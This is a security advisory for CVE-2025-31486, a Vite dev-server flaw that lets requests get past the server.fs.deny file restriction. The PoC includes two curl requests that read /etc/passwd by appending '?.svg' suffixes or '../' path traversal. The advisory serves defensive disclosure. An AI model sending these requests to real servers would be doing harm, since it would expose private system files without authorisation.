GHSA-xcj6-pq6g-qj4x

Source

https://github.com/advisories/GHSA-xcj6-pq6g-qj4x

Import Source

https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/04/GHSA-xcj6-pq6g-qj4x/GHSA-xcj6-pq6g-qj4x.json

JSON Data

https://api.osv.dev/v1/vulns/GHSA-xcj6-pq6g-qj4x

Aliases

CVE-2025-31486

Published

2025-04-04T14:20:05Z

Modified

2025-04-30T17:26:53Z

Severity

5.3 (Medium) CVSS_V3 - CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:N/A:N CVSS Calculator

Summary

Vite allows server.fs.deny to be bypassed with .svg or relative paths

Details

Summary

The contents of arbitrary files can be returned to the browser.

Impact

Only apps explicitly exposing the Vite dev server to the network (using --host or server.host config option) are affected.

Details

`.svg`

Requests ending with .svg are loaded at this line. https://github.com/vitejs/vite/blob/037f801075ec35bb6e52145d659f71a23813c48f/packages/vite/src/node/plugins/asset.ts#L285-L290 By adding ?.svg with ?.wasm?init or with sec-fetch-dest: script header, the restriction was able to bypass.

This bypass is only possible if the file is smaller than <code>build.assetsInlineLimit</code> (default: 4kB) and when using Vite 6.0+.

relative paths

The check was applied before the id normalization. This allowed requests to bypass with relative paths (e.g. ../../).

PoC

npm create vite@latest
cd vite-project/
npm install
npm run dev

send request to read etc/passwd

curl 'http://127.0.0.1:5173/etc/passwd?.svg?.wasm?init'

curl 'http://127.0.0.1:5173/@fs/x/x/x/vite-project/?/../../../../../etc/passwd?import&?raw'

Database specific

{
    "severity": "MODERATE",
    "cwe_ids": [
        "CWE-200",
        "CWE-284"
    ],
    "nvd_published_at": "2025-04-03T19:15:39Z",
    "github_reviewed_at": "2025-04-04T14:20:05Z",
    "github_reviewed": true
}

References